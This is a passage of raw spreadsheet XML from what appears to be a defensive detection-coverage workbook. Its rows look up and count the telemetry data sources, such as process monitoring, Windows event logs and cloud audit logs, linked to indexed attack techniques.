        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F252" s="13"/>
      <c r="G252" s="19"/>
    </row>
    <row r="253" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A253" s="53" t="s">
        <v>1653</v>
      </c>
      <c r="B253" s="45" t="str">
        <f>LOOKUP(A253,'REF-DataSources'!A:C)</f>
        <v>DLL monitoring,Loaded DLLs,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C253" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D253" s="45">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E253" s="45">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F253" s="13"/>
      <c r="G253" s="19"/>
    </row>
    <row r="254" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A254" s="53" t="s">
        <v>1659</v>
      </c>
      <c r="B254" s="45" t="str">
        <f>LOOKUP(A254,'REF-DataSources'!A:C)</f>
        <v>Process use of network,Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C254" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D254" s="45">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E254" s="45">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F254" s="13"/>
      <c r="G254" s="19"/>
    </row>
    <row r="255" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A255" s="55" t="s">
        <v>345</v>
      </c>
      <c r="B255" s="45" t="str">
        <f>LOOKUP(A255,'REF-DataSources'!A:C)</f>
        <v>Network intrusion detection system,Network protocol analysis,Process use of network,Process monitoring</v>
      </c>
      <c r="C255" s="17">
        <v>100</v>
      </c>
      <c r="D255" s="45">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E255" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F255" s="13"/>
      <c r="G255" s="19"/>
    </row>
    <row r="256" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A256" s="53" t="s">
        <v>346</v>
      </c>
      <c r="B256" s="45" t="str">
        <f>LOOKUP(A256,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Process use of network,DLL monitoring</v>
      </c>
      <c r="C256" s="17" t="s">
        <v>107</v>
      </c>
      <c r="D256" s="45">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E256" s="45">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F256" s="13"/>
      <c r="G256" s="19"/>
    </row>
    <row r="257" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A257" s="53" t="s">
        <v>347</v>
      </c>
      <c r="B257" s="45" t="str">
        <f>LOOKUP(A257,'REF-DataSources'!A:C)</f>
        <v>Anti-virus,Email gateway,Network intrusion detection system,Web logs</v>
      </c>
      <c r="C257" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D257" s="45">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E257" s="45">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F257" s="13"/>
      <c r="G257" s="19"/>
    </row>
    <row r="258" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A258" s="53" t="s">
        <v>348</v>
      </c>
      <c r="B258" s="45" t="str">
        <f>LOOKUP(A258,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
      <c r="C258" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D258" s="45">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E258" s="45">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F258" s="13"/>
      <c r="G258" s="19"/>
    </row>
    <row r="259" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A259" s="53" t="s">
        <v>1680</v>
      </c>
      <c r="B259" s="45" t="str">
        <f>LOOKUP(A259,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C259" s="17" t="s">
        <v>69</v>
      </c>
      <c r="D259" s="45">
        <f t="shared" ref="D259:D322" si="9">LEN(TRIM(B259))-LEN(SUBSTITUTE(TRIM(B259),",",""))+1</f>
        <v>4</v>
      </c>
      <c r="E259" s="45">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F259" s="13"/>
      <c r="G259" s="19"/>
    </row>
    <row r="260" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A260" s="53" t="s">
        <v>1685</v>
      </c>
      <c r="B260" s="45" t="str">
        <f>LOOKUP(A260,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C260" s="17" t="s">
        <v>69</v>
      </c>
      <c r="D260" s="45">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E260" s="45">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F260" s="13"/>
      <c r="G260" s="19"/>
    </row>
    <row r="261" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A261" s="55" t="s">
        <v>350</v>
      </c>
      <c r="B261" s="45" t="str">
        <f>LOOKUP(A261,'REF-DataSources'!A:C)</f>
        <v>Process monitoring</v>
      </c>
      <c r="C261" s="17">
        <v>100</v>
      </c>
      <c r="D261" s="45">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="E261" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F261" s="13"/>
      <c r="G261" s="19"/>
    </row>
    <row r="262" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A262" s="55" t="s">
        <v>1693</v>
      </c>
      <c r="B262" s="45" t="str">
        <f>LOOKUP(A262,'REF-DataSources'!A:C)</f>
        <v>Process monitoring</v>
      </c>
      <c r="C262" s="17">
        <v>100</v>
      </c>
      <c r="D262" s="45">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="E262" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F262" s="13"/>
      <c r="G262" s="19"/>
    </row>
    <row r="263" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A263" s="53" t="s">
        <v>351</v>
      </c>
      <c r="B263" s="45" t="str">
        <f>LOOKUP(A263,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,API monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C263" s="17" t="s">
        <v>69</v>
      </c>
      <c r="D263" s="45">
        <f t="shared" si="9"/>
        <v>4</v>
      </c>
      <c r="E263" s="45">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F263" s="13"/>
      <c r="G263" s="19"/>
    </row>
    <row r="264" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A264" s="55" t="s">
        <v>355</v>
      </c>
      <c r="B264" s="45" t="str">
        <f>LOOKUP(A264,'REF-DataSources'!A:C)</f>
        <v>Windows event logs</v>
      </c>
      <c r="C264" s="17">
        <v>100</v>
      </c>
      <c r="D264" s="45">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="E264" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F264" s="13"/>
      <c r="G264" s="19"/>
    </row>
    <row r="265" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A265" s="53" t="s">
        <v>356</v>
      </c>
      <c r="B265" s="45" t="str">
        <f>LOOKUP(A265,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C265" s="17" t="s">
        <v>69</v>
      </c>
      <c r="D265" s="45">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E265" s="45">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F265" s="13"/>
      <c r="G265" s="19"/>
    </row>
    <row r="266" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A266" s="53" t="s">
        <v>357</v>
      </c>
      <c r="B266" s="45" t="str">
        <f>LOOKUP(A266,'REF-DataSources'!A:C)</f>
        <v>Kernel drivers,File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C266" s="17" t="s">
        <v>398</v>
      </c>
      <c r="D266" s="45">
        <f t="shared" si="9"/>
        <v>4</v>
      </c>
      <c r="E266" s="45">
        <f t="shared" ref="E266:E329" si="10">LEN(TRIM(C266))-LEN(SUBSTITUTE(TRIM(C266),";",""))+1</f>
        <v>4</v>
      </c>
      <c r="F266" s="13"/>
      <c r="G266" s="19"/>
    </row>
    <row r="267" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A267" s="53" t="s">
        <v>361</v>
      </c>
      <c r="B267" s="45" t="str">
        <f>LOOKUP(A267,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters,Process monitoring,Windows Registry,API monitoring</v>
      </c>
      <c r="C267" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D267" s="45">
        <f t="shared" si="9"/>
        <v>5</v>
      </c>
      <c r="E267" s="45">
        <f t="shared" si="10"/>
        <v>2</v>
      </c>
      <c r="F267" s="13"/>
      <c r="G267" s="19"/>
    </row>
    <row r="268" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A268" s="53" t="s">
        <v>362</v>
      </c>
      <c r="B268" s="53" t="str">
        <f>LOOKUP(A268,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Services,Windows event logs,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="D268" s="53">
        <f t="shared" si="9"/>
        <v>5</v>
      </c>
      <c r="E268" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="269" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A269" s="53" t="s">
        <v>363</v>
      </c>
      <c r="B269" s="53" t="str">
        <f>LOOKUP(A269,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Web application firewall logs,Web logs,Packet capture</v>
      </c>
      <c r="D269" s="53">
        <f t="shared" si="9"/>
        <v>4</v>
      </c>
      <c r="E269" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="270" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A270" s="53" t="s">
        <v>1725</v>
      </c>
      <c r="B270" s="53" t="str">
        <f>LOOKUP(A270,'REF-DataSources'!A:C)</f>
        <v>Web logs,Web application firewall logs,Packet capture</v>
      </c>
      <c r="D270" s="53">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E270" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="271" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A271" s="53" t="s">
        <v>1730</v>
      </c>
      <c r="B271" s="53" t="str">
        <f>LOOKUP(A271,'REF-DataSources'!A:C)</f>
        <v>Web logs,Web application firewall logs,Packet capture</v>
      </c>
      <c r="D271" s="53">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E271" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="272" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A272" s="53" t="s">
        <v>367</v>
      </c>
      <c r="B272" s="53" t="str">
        <f>LOOKUP(A272,'REF-DataSources'!A:C)</f>
        <v>BIOS,Component firmware</v>
      </c>
      <c r="D272" s="53">
        <f t="shared" si="9"/>
        <v>2</v>
      </c>
      <c r="E272" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="273" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A273" s="53" t="s">
        <v>368</v>
      </c>
      <c r="B273" s="53" t="str">
        <f>LOOKUP(A273,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Stackdriver logs,AWS CloudTrail logs,Process use of network,Process monitoring,Network protocol analysis,Network device logs</v>
      </c>
      <c r="D273" s="53">
        <f t="shared" si="9"/>
        <v>7</v>
      </c>
      <c r="E273" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="274" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A274" s="53" t="s">
        <v>370</v>
      </c>
      <c r="B274" s="53" t="str">
        <f>LOOKUP(A274,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="D274" s="53">
        <f t="shared" si="9"/>
        <v>2</v>
      </c>
      <c r="E274" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="275" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A275" s="53" t="s">
        <v>1747</v>
      </c>
      <c r="B275" s="53" t="str">
        <f>LOOKUP(A275,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring</v>
      </c>
      <c r="D275" s="53">
        <f t="shared" si="9"/>
        <v>2</v>
      </c>
      <c r="E275" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="276" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A276" s="53" t="s">
        <v>1752</v>
      </c>
      <c r="B276" s="53" t="str">
        <f>LOOKUP(A276,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process use of network</v>
      </c>
      <c r="D276" s="53">
        <f t="shared" si="9"/>
        <v>2</v>
      </c>
      <c r="E276" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="277" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A277" s="53" t="s">
        <v>1758</v>
      </c>
      <c r="B277" s="53" t="str">
        <f>LOOKUP(A277,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="D277" s="53">
        <f t="shared" si="9"/>
        <v>2</v>
      </c>
      <c r="E277" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="278" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A278" s="53" t="s">
        <v>371</v>
      </c>
      <c r="B278" s="53" t="str">
        <f>LOOKUP(A278,'REF-DataSources'!A:C)</f>
        <v>Sensor health and status,Network protocol analysis,Netflow/Enclave netflow,Network intrusion detection system,Network device logs</v>
      </c>
      <c r="D278" s="53">
        <f t="shared" si="9"/>
        <v>5</v>
      </c>
      <c r="E278" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="279" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A279" s="53" t="s">
        <v>1768</v>
      </c>
      <c r="B279" s="53" t="str">
        <f>LOOKUP(A279,'REF-DataSources'!A:C)</f>
        <v>Sensor health and status,Network protocol analysis,Netflow/Enclave netflow,Network intrusion detection system,Network device logs</v>
      </c>
      <c r="D279" s="53">
        <f t="shared" si="9"/>
        <v>5</v>
      </c>
      <c r="E279" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="280" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A280" s="53" t="s">
        <v>1772</v>
      </c>
      <c r="B280" s="53" t="str">
        <f>LOOKUP(A280,'REF-DataSources'!A:C)</f>
        <v>Sensor health and status,Network protocol analysis,Netflow/Enclave netflow,Network intrusion detection system,Network device logs</v>
      </c>
      <c r="D280" s="53">
        <f t="shared" si="9"/>
        <v>5</v>
      </c>
      <c r="E280" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="281" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A281" s="53" t="s">
        <v>372</v>
      </c>
      <c r="B281" s="53" t="str">
        <f>LOOKUP(A281,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Web logs,Web application firewall logs,Network intrusion detection system,Network protocol analysis,Network device logs,Netflow/Enclave netflow</v>
      </c>
      <c r="D281" s="53">
        <f t="shared" si="9"/>
        <v>7</v>
      </c>
      <c r="E281" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="282" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A282" s="53" t="s">
        <v>1781</v>
      </c>
      <c r="B282" s="53" t="str">
        <f>LOOKUP(A282,'REF-DataSources'!A:C)</f>
        <v>Network device logs,Netflow/Enclave netflow,Network intrusion detection system,SSL/TLS inspection</v>
      </c>
      <c r="D282" s="53">
        <f t="shared" si="9"/>
        <v>4</v>
      </c>
      <c r="E282" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="283" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A283" s="53" t="s">
        <v>1786</v>
      </c>
      <c r="B283" s="53" t="str">
        <f>LOOKUP(A283,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Network device logs,Network intrusion detection system,Web application firewall logs,Web logs,SSL/TLS inspection</v>
      </c>
      <c r="D283" s="53">
        <f t="shared" si="9"/>
        <v>6</v>
      </c>
      <c r="E283" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="284" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A284" s="53" t="s">
        <v>1790</v>
      </c>
      <c r="B284" s="53" t="str">
        <f>LOOKUP(A284,'REF-DataSources'!A:C)</f>
        <v>Network device logs,Network device logs,Network intrusion detection system,Web application firewall logs,Web logs,SSL/TLS inspection</v>
      </c>
      <c r="D284" s="53">
        <f t="shared" si="9"/>
        <v>6</v>
      </c>
      <c r="E284" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="285" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A285" s="53" t="s">
        <v>1795</v>
      </c>
      <c r="B285" s="53" t="str">
        <f>LOOKUP(A285,'REF-DataSources'!A:C)</f>
        <v>Network device logs,Network intrusion detection system,Web application firewall logs,Web logs,SSL/TLS inspection</v>
      </c>
      <c r="D285" s="53">
        <f t="shared" si="9"/>
        <v>5</v>
      </c>
      <c r="E285" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="286" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A286" s="53" t="s">
        <v>379</v>
      </c>
      <c r="B286" s="53" t="str">
        <f>LOOKUP(A286,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Process monitoring,File monitoring,Application logs</v>
      </c>
      <c r="D286" s="53">
        <f t="shared" si="9"/>
        <v>4</v>
      </c>
      <c r="E286" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="287" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A287" s="55" t="s">
        <v>1804</v>
      </c>
      <c r="B287" s="53" t="str">
        <f>LOOKUP(A287,'REF-DataSources'!A:C)</f>
        <v>Application logs</v>
      </c>
      <c r="C287" s="17">
        <v>100</v>
      </c>
      <c r="D287" s="53">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="E287" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="288" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A288" s="53" t="s">
        <v>1809</v>
      </c>
      <c r="B288" s="53" t="str">
        <f>LOOKUP(A288,'REF-DataSources'!A:C)</f>
        <v>Application logs,File monitoring</v>
      </c>
      <c r="D288" s="53">
        <f t="shared" si="9"/>
        <v>2</v>
      </c>
      <c r="E288" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="289" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A289" s="53" t="s">
        <v>1815</v>
      </c>
      <c r="B289" s="53" t="str">
        <f>LOOKUP(A289,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Netflow/Enclave netflow,File monitoring,Authentication logs</v>
      </c>
      <c r="D289" s="53">
        <f t="shared" si="9"/>
        <v>4</v>
      </c>
      <c r="E289" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="290" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A290" s="53" t="s">
        <v>382</v>
      </c>
      <c r="B290" s="53" t="str">
        <f>LOOKUP(A290,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,Azure activity logs,AWS CloudTrail logs,Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="D290" s="53">
        <f t="shared" si="9"/>
        <v>6</v>
      </c>
      <c r="E290" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="291" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A291" s="53" t="s">
        <v>1824</v>
      </c>
      <c r="B291" s="53" t="str">
        <f>LOOKUP(A291,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,Azure activity logs,AWS CloudTrail logs,File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="D291" s="53">
        <f t="shared" si="9"/>
        <v>6</v>
      </c>
      <c r="E291" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="292" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A292" s="53" t="s">
        <v>385</v>
      </c>
      <c r="B292" s="53" t="str">
        <f>LOOKUP(A292,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Asset management</v>
      </c>
      <c r="D292" s="53">
        <f t="shared" si="9"/>
        <v>2</v>
      </c>
      <c r="E292" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="293" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A293" s="53" t="s">
        <v>386</v>
      </c>
      <c r="B293" s="53" t="str">
        <f>LOOKUP(A293,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Stackdriver logs,AWS CloudTrail logs</v>
      </c>
      <c r="D293" s="53">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E293" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="294" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A294" s="53" t="s">
        <v>388</v>
      </c>
      <c r="B294" s="53" t="str">
        <f>LOOKUP(A294,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,OAuth audit logs</v>
      </c>
      <c r="D294" s="53">
        <f t="shared" si="9"/>
        <v>2</v>
      </c>
      <c r="E294" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="295" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A295" s="53" t="s">
        <v>389</v>
      </c>
      <c r="B295" s="53" t="str">
        <f>LOOKUP(A295,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="D295" s="53">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E295" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="296" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A296" s="53" t="s">
        <v>390</v>
      </c>
      <c r="B296" s="53" t="str">
        <f>LOOKUP(A296,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="D296" s="53">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E296" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="297" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A297" s="53" t="s">
        <v>391</v>
      </c>
      <c r="B297" s="53" t="str">
        <f>LOOKUP(A297,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="D297" s="53">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E297" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="298" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A298" s="53" t="s">
        <v>392</v>
      </c>
      <c r="B298" s="53" t="str">
        <f>LOOKUP(A298,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,DNS records,Anti-virus,Web proxy,File monitoring,Mail server,Office 365 trace logs</v>
      </c>
      <c r="D298" s="53">
        <f t="shared" si="9"/>
        <v>7</v>
      </c>
      <c r="E298" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="299" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A299" s="53" t="s">
        <v>393</v>
      </c>
      <c r="B299" s="53" t="str">
        <f>LOOKUP(A299,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="D299" s="53">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E299" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="300" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A300" s="53" t="s">
        <v>396</v>
      </c>
      <c r="B300" s="53" t="str">
        <f>LOOKUP(A300,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="D300" s="53">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E300" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="301" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A301" s="53" t="s">
        <v>397</v>
      </c>
      <c r="B301" s="53" t="str">
        <f>LOOKUP(A301,'REF-DataSources'!A:C)</f>
        <v>Office 365 audit logs,Azure activity logs,Stackdriver logs,AWS CloudTrail logs</v>
      </c>
      <c r="D301" s="53">
        <f t="shared" si="9"/>
        <v>4</v>
      </c>
      <c r="E301" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="302" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A302" s="53" t="s">
        <v>399</v>
      </c>
      <c r="B302" s="53" t="str">
        <f>LOOKUP(A302,'REF-DataSources'!A:C)</f>
        <v>File monitoring,API monitoring</v>
      </c>
      <c r="D302" s="53">
        <f t="shared" si="9"/>
        <v>2</v>
      </c>
      <c r="E302" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="303" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A303" s="53" t="s">
        <v>1877</v>
      </c>
      <c r="B303" s="53" t="str">
        <f>LOOKUP(A303,'REF-DataSources'!A:C)</f>
        <v>VBR,MBR,Component firmware,Process monitoring,Disk forensics,EFI,BIOS,API monitoring</v>
      </c>
      <c r="D303" s="53">
        <f t="shared" si="9"/>
        <v>8</v>
      </c>
      <c r="E303" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="304" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A304" s="53" t="s">
        <v>1884</v>
      </c>
      <c r="B304" s="53" t="str">
        <f>LOOKUP(A304,'REF-DataSources'!A:C)</f>
        <v>EFI,BIOS,API monitoring</v>
      </c>
      <c r="D304" s="53">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E304" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="305" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A305" s="53" t="s">
        <v>1891</v>
      </c>
      <c r="B305" s="53" t="str">
        <f>LOOKUP(A305,'REF-DataSources'!A:C)</f>
        <v>Component firmware,Process monitoring,Disk forensics,API monitoring</v>
      </c>
      <c r="D305" s="53">
        <f t="shared" si="9"/>
        <v>4</v>
      </c>
      <c r="E305" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="306" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A306" s="53" t="s">
        <v>1896</v>
      </c>
      <c r="B306" s="53" t="str">
        <f>LOOKUP(A306,'REF-DataSources'!A:C)</f>
        <v>VBR,MBR,API monitoring</v>
      </c>
      <c r="D306" s="53">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E306" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="307" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A307" s="53" t="s">
        <v>1901</v>
      </c>
      <c r="B307" s="53" t="str">
        <f>LOOKUP(A307,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Netflow/Enclave netflow,Network protocol analysis,Packet capture</v>
      </c>
      <c r="D307" s="53">
        <f t="shared" si="9"/>
        <v>4</v>
      </c>
      <c r="E307" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="308" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A308" s="53" t="s">
        <v>1906</v>
      </c>
      <c r="B308" s="53" t="str">
        <f>LOOKUP(A308,'REF-DataSources'!A:C)</f>
        <v>Network device run-time memory,Network device command history,Network device configuration,File monitoring,Network device logs</v>
      </c>
      <c r="D308" s="53">
        <f t="shared" si="9"/>
        <v>5</v>
      </c>
      <c r="E308" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="309" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A309" s="53" t="s">
        <v>1911</v>
      </c>
      <c r="B309" s="53" t="str">
        <f>LOOKUP(A309,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,Windows Registry,File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="D309" s="53">
        <f t="shared" si="9"/>
        <v>5</v>
      </c>
      <c r="E309" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="310" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A310" s="55" t="s">
        <v>1916</v>
      </c>
      <c r="B310" s="53" t="str">
        <f>LOOKUP(A310,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring</v>
      </c>
      <c r="C310" s="56" t="s">
        <v>126</v>
      </c>
      <c r="D310" s="53">
        <f t="shared" si="9"/>
